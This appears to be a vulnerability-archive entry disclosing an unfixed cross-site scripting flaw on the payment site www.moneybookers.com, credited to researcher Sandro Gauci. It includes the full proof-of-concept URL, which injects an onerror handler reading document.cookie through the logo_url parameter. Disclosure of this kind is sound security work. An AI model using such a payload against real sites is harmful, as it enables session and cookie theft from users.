Security researcher Sandro Gauci, has submitted on 28/11/2008 a cross-site-scripting (XSS) vulnerability affecting www.moneybookers.com, which at the time of submission ranked 1236 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 22/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 28/11/2008 |
Date published: 22/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: Sandro Gauci |
Domain: www.moneybookers.com |
Category: XSS |
Pagerank: 1236 |
URL: https://www.moneybookers.com/app/payment.pl?pay_to_email=xxx@xxx.com&transaction_id=1184812&status_u rl=https://www.xxx.com&language=EN&pay_from_email=xxx@xxx.com&logo_url=%22%20onerror=alert(document. cookie)%20b&amount=10¤cy=EUR |
Click here to view the mirror
|
|
|